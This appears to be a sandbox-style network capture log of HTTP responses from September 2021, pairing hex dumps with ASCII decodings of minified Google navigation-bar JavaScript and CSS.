                                                                                                                                                                      2021-09-14 14:03:24 UTC49INData Raw: 53 2b 29 2f 2e 65 78 65 63 28 61 29 7d 28 29 3b 68 63 26 26 28 67 63 3d 68 63 3f 68 63 5b 31 5d 3a 22 22 29 3b 69 66 28 5f 2e 42 29 7b 76 61 72 20 6a 63 3d 65 63 28 29 3b 69 66 28 6e 75 6c 6c 21 3d 6a 63 26 26 6a 63 3e 70 61 72 73 65 46 6c 6f 61 74 28 67 63 29 29 7b 66 63 3d 53 74 72 69 6e 67 28 6a 63 29 3b 62 72 65 61 6b 20 61 7d 7d 66 63 3d 67 63 7d 5f 2e 6b 63 3d 66 63 3b 69 66 28 5f 2e 74 2e 64 6f 63 75 6d 65 6e 74 26 26 5f 2e 42 29 7b 76 61 72 20 6d 63 3d 65 63 28 29 3b 6c 63 3d 6d 63 3f 6d 63 3a 70 61 72 73 65 49 6e 74 28 5f 2e 6b 63 2c 31 30 29 7c 7c 76 6f 69 64 20 30 7d 65 6c 73 65 20 6c 63 3d 76 6f 69 64 20 30 3b 5f 2e 6e 63 3d 6c 63 3b 0a 5f 2e 6f 63 3d 5f 2e 7a 62 28 29 3b 5f 2e 70 63 3d 4f 62 28 29 7c 7c 5f 2e 41 28 22 69 50 6f 64 22 29 3b 5f
                                                                                                                                                                      Data Ascii: S+)/.exec(a)}();hc&&(gc=hc?hc[1]:"");if(_.B){var jc=ec();if(null!=jc&&jc>parseFloat(gc)){fc=String(jc);break a}}fc=gc}_.kc=fc;if(_.t.document&&_.B){var mc=ec();lc=mc?mc:parseInt(_.kc,10)||void 0}else lc=void 0;_.nc=lc;_.oc=_.zb();_.pc=Ob()||_.A("iPod");_
                                                                                                                                                                      2021-09-14 14:03:24 UTC50INData Raw: 7a 63 28 63 2c 62 5b 31 5d 29 7d 74 68 69 73 2e 6f 3d 21 30 7d 7d 3b 5f 2e 68 3d 5f 2e 41 63 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 68 2e 69 73 46 72 6f 7a 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 31 7d 3b 5f 2e 68 2e 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 46 62 28 21 31 29 3b 72 65 74 75 72 6e 20 5f 2e 79 63 3f 61 3a 6d 61 28 61 29 7d 3b 5f 2e 68 2e 46 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 6f 29 7b 74 68 69 73 2e 6a 2e 6c 65 6e 67 74 68 3d 30 3b 76 61 72 20 61 3d 42 63 28 74 68 69 73 29 3b 61 2e 73 6f 72 74 28 29 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 6d 61 70 5b 61 5b 62 5d 5d
                                                                                                                                                                      Data Ascii: zc(c,b[1])}this.o=!0}};_.h=_.Ac.prototype;_.h.isFrozen=function(){return!1};_.h.toJSON=function(){var a=this.Fb(!1);return _.yc?a:ma(a)};_.h.Fb=function(){if(!this.o){this.j.length=0;var a=Bc(this);a.sort();for(var b=0;b<a.length;b++){var c=this.map[a[b]]
                                                                                                                                                                      2021-09-14 14:03:24 UTC51INData Raw: 61 6c 75 65 3d 62 7d 2c 43 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 41 3d 30 3b 74 68 69 73 2e 6f 3d 61 7d 3b 43 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 41 3c 74 68 69 73 2e 6f 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 74 68 69 73 2e 6f 5b 74 68 69 73 2e 41 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 3b 43 63 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 0a 76 61 72 20 45 63 3b 0a 5f 2e 43 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 5f 2e 44 63 3b 5f 2e 44 63 3d
                                                                                                                                                                      Data Ascii: alue=b},Cc=function(a){this.A=0;this.o=a};Cc.prototype.next=function(){return this.A<this.o.length?{done:!1,value:this.o[this.A++]}:{done:!0,value:void 0}};Cc.prototype[Symbol.iterator]=function(){return this};var Ec;_.C=function(a,b,c){var d=_.Dc;_.Dc=
                                                                                                                                                                      2021-09-14 14:03:24 UTC53INData Raw: 46 63 28 61 29 2c 61 2e 6f 5b 62 5d 3d 63 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 48 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 2d 31 3d 3d 3d 63 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 2e 6a 7c 7c 28 61 2e 6a 3d 7b 7d 29 3b 69 66 28 21 61 2e 6a 5b 63 5d 29 7b 76 61 72 20 64 3d 5f 2e 45 28 61 2c 63 29 3b 64 26 26 28 61 2e 6a 5b 63 5d 3d 6e 65 77 20 62 28 64 29 29 7d 72 65 74 75 72 6e 20 61 2e 6a 5b 63 5d 7d 3b 5f 2e 49 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 6a 7c 7c 28 61 2e 6a 3d 7b 7d 29 3b 76 61 72 20 64 3d 63 3f 63 2e 46 62 28 21 31 29 3a 63 3b 61 2e 6a 5b 62 5d 3d 63 3b 72 65 74 75 72 6e 20 5f 2e 47 28 61 2c 62 2c 64 29 7d 3b 5f 2e 43 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                      Data Ascii: Fc(a),a.o[b]=c);return a};_.H=function(a,b,c){if(-1===c)return null;a.j||(a.j={});if(!a.j[c]){var d=_.E(a,c);d&&(a.j[c]=new b(d))}return a.j[c]};_.I=function(a,b,c){a.j||(a.j={});var d=c?c.Fb(!1):c;a.j[b]=c;return _.G(a,b,d)};_.C.prototype.toJSON=function
                                                                                                                                                                      2021-09-14 14:03:24 UTC54INData Raw: 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 41 3b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 30 3b 64 3c 63 3b 2b 2b 64 29 69 66 28 62 5b 61 5b 64 5d 5d 29 62 3d 62 5b 61 5b 64 5d 5d 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 3f 62 3a 6e 75 6c 6c 7d 3b 51 63 2e 70 72 6f 74 6f 74 79 70 65 2e 47 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 74 68 69 73 2e 6a 2e 6c 65 6e 67 74 68 2c 62 3d 74 68 69 73 2e 6a 2c 63 3d 5b 5d 2c 64 3d 30 3b 64 3c 61 3b 2b 2b 64 29 7b 76 61 72 20 65 3d 62 5b 64 5d 2e 6a 28 29 2c 66 3d 74 68 69 73 2e 72 65 73 6f 6c 76 65 28 65 29 3b 69 66
                                                                                                                                                                      Data Ascii: tion(a){var b=this.A;a=a.split(".");for(var c=a.length,d=0;d<c;++d)if(b[a[d]])b=b[a[d]];else return null;return b instanceof Function?b:null};Qc.prototype.Gd=function(){for(var a=this.j.length,b=this.j,c=[],d=0;d<a;++d){var e=b[d].j(),f=this.resolve(e);if
                                                                                                                                                                      2021-09-14 14:03:24 UTC55INData Raw: 45 28 61 2c 31 30 29 29 3b 74 68 69 73 2e 64 61 74 61 2e 6f 67 66 3d 5f 2e 70 28 5f 2e 45 28 63 2c 33 29 29 3b 76 61 72 20 64 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 73 6e 3f 2f 2e 2a 68 70 24 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 73 6e 29 3f 21 31 3a 21 30 3a 5f 2e 6e 28 5f 2e 46 28 61 2c 37 29 29 3b 74 68 69 73 2e 64 61 74 61 2e 6f 67 72 70 3d 64 3f 22 31 22 3a 22 22 3b 74 68 69 73 2e 64 61 74 61 2e 6f 67 76 3d 5f 2e 70 28 5f 2e 45 28 63 2c 36 29 29 2b 22 2e 22 2b 5f 2e 70 28 5f 2e 45 28 63 2c 37 29 29 3b 74 68 69 73 2e 64 61 74 61 2e 6f 67 64 3d 5f 2e 70 28 5f 2e 45 28 61 2c 32 31 29 29 3b 74 68 69 73 2e 64 61 74 61 2e 6f 67 63 3d 5f 2e 70 28 5f 2e 45 28 61 2c 32 30 29 29 3b 74
                                                                                                                                                                      Data Ascii: E(a,10));this.data.ogf=_.p(_.E(c,3));var d=window.google&&window.google.sn?/.*hp$/.test(window.google.sn)?!1:!0:_.n(_.F(a,7));this.data.ogrp=d?"1":"";this.data.ogv=_.p(_.E(c,6))+"."+_.p(_.E(c,7));this.data.ogd=_.p(_.E(a,21));this.data.ogc=_.p(_.E(a,20));t
                                                                                                                                                                      2021-09-14 14:03:24 UTC57INData Raw: 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 71 28 5f 2e 63 64 2c 5f 2e 43 29 3b 0a 5f 2e 64 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 4e 63 26 26 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 4e 63 22 29 29 72 65 74 75 72 6e 20 61 2e 4e 63 3b 76 61 72 20 62 3d 6e 65 77 20 61 3b 72 65 74 75 72 6e 20 61 2e 4e 63 3d 62 7d 3b 0a 5f 2e 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6a 3d 7b 7d 3b 74 68 69 73 2e 6f 3d 7b 7d 7d 3b 5f 2e 67 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 5f 2e 65 64 2e 6a 28 29 3b 69 66 28 61 20 69 6e 20 63 2e 6a 29 7b 69 66 28 63 2e 6a 5b 61 5d 21 3d 62 29 74 68 72 6f 77 20 6e 65 77 20 66 64 28 61 29 3b 7d 65 6c 73 65 7b 63 2e 6a 5b 61 5d 3d 62 3b 69 66 28 62 3d 63 2e 6f
                                                                                                                                                                      Data Ascii: .call(this,a)};_.q(_.cd,_.C);_.dd=function(a){if(a.Nc&&a.hasOwnProperty("Nc"))return a.Nc;var b=new a;return a.Nc=b};_.ed=function(){this.j={};this.o={}};_.gd=function(a,b){var c=_.ed.j();if(a in c.j){if(c.j[a]!=b)throw new fd(a);}else{c.j[a]=b;if(b=c.o
                                                                                                                                                                      2021-09-14 14:03:24 UTC58INData Raw: 2e 6e 61 28 5f 2e 4a 63 28 63 2c 33 2c 31 29 29 3a 5f 2e 6e 61 28 5f 2e 4a 63 28 63 2c 32 2c 31 45 2d 34 29 29 29 29 2c 6f 67 75 73 3a 65 7d 29 3b 69 66 28 66 29 7b 22 6f 67 77 22 69 6e 20 66 26 26 28 74 68 69 73 2e 64 61 74 61 2e 6f 67 77 3d 66 2e 6f 67 77 2c 64 65 6c 65 74 65 20 66 2e 6f 67 77 29 3b 22 76 65 64 22 69 6e 20 66 26 26 28 74 68 69 73 2e 64 61 74 61 2e 76 65 64 3d 66 2e 76 65 64 2c 64 65 6c 65 74 65 20 66 2e 76 65 64 29 3b 61 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 67 20 69 6e 20 66 29 30 21 3d 61 2e 6c 65 0d 0a
                                                                                                                                                                      Data Ascii: .na(_.Jc(c,3,1)):_.na(_.Jc(c,2,1E-4)))),ogus:e});if(f){"ogw"in f&&(this.data.ogw=f.ogw,delete f.ogw);"ved"in f&&(this.data.ved=f.ved,delete f.ved);a=[];for(var g in f)0!=a.le
                                                                                                                                                                      2021-09-14 14:03:24 UTC58INData Raw: 34 63 30 65 0d 0a 6e 67 74 68 26 26 61 2e 70 75 73 68 28 22 2c 22 29 2c 61 2e 70 75 73 68 28 70 64 28 67 29 29 2c 61 2e 70 75 73 68 28 22 2e 22 29 2c 61 2e 70 75 73 68 28 70 64 28 66 5b 67 5d 29 29 3b 66 3d 61 2e 6a 6f 69 6e 28 22 22 29 3b 22 22 21 3d 66 26 26 28 74 68 69 73 2e 64 61 74 61 2e 6f 67 61 64 3d 66 29 7d 7d 3b 0a 5f 2e 71 28 71 64 2c 56 63 29 3b 76 61 72 20 70 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 53 74 72 69 6e 67 28 61 29 3b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 22 2e 22 2c 22 25 32 45 22 29 2e 72 65 70 6c 61 63 65 28 22 2c 22 2c 22 25 32 43 22 29 7d 2c 6f 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 72 64 29 7b 72 64 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 6e 64 2e 6c 65 6e 67 74 68 3b 62 2b 2b
                                                                                                                                                                      Data Ascii: 4c0ength&&a.push(","),a.push(pd(g)),a.push("."),a.push(pd(f[g]));f=a.join("");""!=f&&(this.data.ogad=f)}};_.q(qd,Vc);var pd=function(a){a=String(a);return a.replace(".","%2E").replace(",","%2C")},od=function(a){if(!rd){rd={};for(var b=0;b<nd.length;b++
                                                                                                                                                                      2021-09-14 14:03:24 UTC59INData Raw: 3d 63 7d 3b 0a 5f 2e 4b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 42 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 6a 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 47 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 44 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 46 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 4a 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 43 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 41 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 6f 3d 6e 65 77 20 5f 2e 78 64 3b 74 68 69 73 2e 4b 3d 6e 65 77 20 5f 2e 78 64 7d 3b 5f 2e 68 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 68 2e 46 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 42 7d 3b 5f 2e 68 2e 4e 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72
                                                                                                                                                                      Data Ascii: =c};_.K=function(){this.B=new _.xd;this.j=new _.xd;this.G=new _.xd;this.D=new _.xd;this.F=new _.xd;this.J=new _.xd;this.C=new _.xd;this.A=new _.xd;this.o=new _.xd;this.K=new _.xd};_.h=_.K.prototype;_.h.Fi=function(){return this.B};_.h.Ni=function(){retur
                                                                                                                                                                      2021-09-14 14:03:24 UTC61INData Raw: 72 6f 74 6f 74 79 70 65 2e 4d 69 3b 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 68 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 69 3b 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 69 3b 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 6a 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 69 3b 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 6b 3d 5f 2e 4b 2e 70 72 6f 74 6f 74 79 70 65 2e 79 69 3b 5f 2e 77 28 22 67 62 61 72 2e 61 22 2c 5f 2e 4b 2e 6a 28 29 29 3b 76 61 72 20 49 64 3d 6e 65 77 20 51 63 28 77 69 6e 64 6f 77 29 3b 5f 2e 67 64 28 22 61 70 69 22 2c 49 64 29 3b 0a 76 61 72 20 4a 64 3d 5f 2e 44 64 28 29 7c 7c 6e 65 77 20 5f 2e 50 63 2c 4b 64 3d 5f 2e 70 28 5f 2e 45 28 4a 64 2c 38 29 29 3b 77 69 6e 64 6f
                                                                                                                                                                      Data Ascii: rototype.Mi;_.K.prototype.bh=_.K.prototype.Ji;_.K.prototype.bi=_.K.prototype.Ki;_.K.prototype.bj=_.K.prototype.zi;_.K.prototype.bk=_.K.prototype.yi;_.w("gbar.a",_.K.j());var Id=new Qc(window);_.gd("api",Id);var Jd=_.Dd()||new _.Pc,Kd=_.p(_.E(Jd,8));windo
                                                                                                                                                                      2021-09-14 14:03:24 UTC62INData Raw: 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 67 62 5f 56 61 3a 6e 6f 74 28 2e 67 62 5f 45 64 29 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7a 2d 69 6e 64 65 78 3a 39 38 36 7d 40 6b 65 79 66 72 61 6d 65 73 20 67 62 5f 5f 61 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 61 2e 67 62 5f 5a 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 34 32 38 35 66 34 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 65 78
                                                                                                                                                                      Data Ascii: ight:100%;margin:0;padding:0}.gb_Va:not(.gb_Ed){font:13px/27px Roboto,RobotoDraft,Arial,sans-serif;z-index:986}@keyframes gb__a{0%{opacity:0}50%{opacity:1}}a.gb_Z{border:none;color:#4285f4;cursor:default;font-weight:bold;outline:none;position:relative;tex
                                                                                                                                                                      2021-09-14 14:03:24 UTC63INData Raw: 61 2c 47 72 61 64 69 65 6e 74 54 79 70 65 3d 30 29 7d 23 67 62 20 61 2e 67 62 5f 33 2e 67 62 5f 33 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 67 62 5f 33 3a 68 6f 76 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 7d 2e 67 62 5f 33 3a 61 63 74 69 76 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 63 37 38 64 63 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 63 37 61 65 34 2c 23 33 66 37 36 64 33 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 33 63 37 61 65 34
                                                                                                                                                                      Data Ascii: a,GradientType=0)}#gb a.gb_3.gb_3{color:#fff}.gb_3:hover{box-shadow:0 1px 0 rgba(0,0,0,.15)}.gb_3:active{box-shadow:inset 0 2px 0 rgba(0,0,0,.15);background:#3c78dc;background:-ms-linear-gradient(top,#3c7ae4,#3f76d3);background:linear-gradient(top,#3c7ae4
                                                                                                                                                                      2021-09-14 14:03:24 UTC64INData Raw: 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 38 70 78 3b 74 6f 70 3a 36 32 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 67 62 5f 5f 61 20 2e 32 73 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 7d 2e 67 62 5f 62 64 2e 67 62 5f 6c 61 20 2e 67 62 5f 58 61 2c 2e 67 62 5f 62 64 2e 67 62 5f 6c 61 20 2e 67 62 5f 5a 61 2c 2e 67 62 5f 62 64 2e 67 62
                                                                                                                                                                      Data Ascii: olor:rgba(0,0,0,.2);color:#000;box-shadow:0 2px 10px rgba(0,0,0,.2);display:none;outline:none;overflow:hidden;position:absolute;right:8px;top:62px;animation:gb__a .2s;border-radius:2px;-ms-user-select:text}.gb_bd.gb_la .gb_Xa,.gb_bd.gb_la .gb_Za,.gb_bd.gb
                                                                                                                                                                      2021-09-14 14:03:24 UTC66INData Raw: 6f 6e 3a 68 6f 76 65 72 20 73 76 67 2c 2e 67 62 5f 43 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 36 30 2c 36 34 2c 36 37 2c 30 2e 30 38 29 7d 2e 67 62 5f 69 61 20 2e 67 62 5f 43 2e 67 62 5f 4d 61 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 5f 43 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 74 72 75 65 5d 2c 2e 67 62 5f 43 3a 68 6f 76 65 72 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 74 72 75 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 39 35 2c 39 39 2c 31 30 34 2c 30 2e 32 34 29 7d 2e 67 62 5f 43 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 74 72 75 65 5d 20 2e 67 62 5f 56 65 2c 2e 67 62 5f 43 5b 61 72 69 61
                                                                                                                                                                      Data Ascii: on:hover svg,.gb_C:hover{background-color:rgba(60,64,67,0.08)}.gb_ia .gb_C.gb_Ma:hover{background-color:transparent}.gb_C[aria-expanded=true],.gb_C:hover[aria-expanded=true]{background-color:rgba(95,99,104,0.24)}.gb_C[aria-expanded=true] .gb_Ve,.gb_C[aria
                                                                                                                                                                      2021-09-14 14:03:24 UTC67INData Raw: 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 32 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 36 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 6f 70
                                                                                                                                                                      Data Ascii: oogle Sans,Roboto,RobotoDraft,Helvetica,Arial,sans-serif;font-size:20px;font-weight:400;letter-spacing:0.25px;line-height:48px;margin-bottom:2px;opacity:1;overflow:hidden;padding-left:16px;position:relative;text-overflow:ellipsis;vertical-align:middle;top
                                                                                                                                                                      2021-09-14 14:03:24 UTC68INData Raw: 6f 6e 74 65 6e 74 3b 6d 69 6e 2d 77 69 64 74 68 3a 6d 69 6e 2d 63 6f 6e 74 65 6e 74 7d 2e 67 62 5f 70 61 3a 6e 6f 74 28 2e 67 62 5f 71 61 29 20 2e 67 62 5f 4a 64 7b 70 61 64 64 69 6e 67 3a 38 70 78 7d 2e 67 62 5f 70 61 2e 67 62 5f 51 64 20 2e 67 62 5f 4a 64 7b 2d 6d 73 2d 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 3b 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 7d 2e 67 62 5f 70 61 20 2e 67 62 5f 4a 64 2e 67 62 5f 52 64 2e 67 62 5f 53 64 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 2e 67 62 5f 70 61 2e 67 62 5f 71 61 20 2e 67 62 5f 4a 64 7b 70 61 64 64 69 6e 67 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 38 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 2e 67 62 5f 49 64 7b 68 65 69 67 68 74 3a 34 38 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64
                                                                                                                                                                      Data Ascii: ontent;min-width:min-content}.gb_pa:not(.gb_qa) .gb_Jd{padding:8px}.gb_pa.gb_Qd .gb_Jd{-ms-flex:1 0 auto;flex:1 0 auto}.gb_pa .gb_Jd.gb_Rd.gb_Sd{min-width:0}.gb_pa.gb_qa .gb_Jd{padding:4px;padding-left:8px;min-width:0}.gb_Id{height:48px;vertical-align:mid
                                                                                                                                                                      2021-09-14 14:03:24 UTC69INData Raw: 64 69 6e 67 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 7d 2e 67 62 5f 33 64 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 34 73 7d 2e 67 62 5f 34 64 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 7d 2e 67 62 5f 76 63 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 7d 2e 67 62 5f 70 61 20 61 2c 2e 67 62 5f 41 63 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 67 62 5f 73 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 37 29 7d 2e 67 62 5f 70 61 20 73 76 67 2c 2e 67 62 5f 41 63 20 73 76 67 2c 2e 67 62 5f 57 63 20 2e 67 62 5f 35 64 2c 2e 67 62 5f 4d 63
                                                                                                                                                                      Data Ascii: ding:0 12px;text-overflow:ellipsis;white-space:nowrap;-ms-user-select:text}.gb_3d{transition:background-color .4s}.gb_4d{color:black}.gb_vc{color:white}.gb_pa a,.gb_Ac a{color:inherit}.gb_s{color:rgba(0,0,0,0.87)}.gb_pa svg,.gb_Ac svg,.gb_Wc .gb_5d,.gb_Mc
                                                                                                                                                                      2021-09-14 14:03:24 UTC71INData Raw: 67 62 5f 33 2e 67 62 5f 33 2e 67 62 5f 39 64 2c 23 67 62 20 61 2e 67 62 5f 32 2e 67 62 5f 32 2e 67 62 5f 39 64 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 67 62 5f 33 2e 67 62 5f 39 64 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 62 37 64 65 39 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 30 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 33 29 2c 30 20 31 70 78 20 33 70 78 20 31 70 78 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 31 35 29 7d 2e 67 62 5f 33 2e 67 62 5f 39 64 3a 66 6f 63 75 73 2c 2e 67 62 5f 33 2e 67 62 5f 39 64 3a 68 6f 76 65 72 3a 66 6f 63 75 73 7b 62 61 63 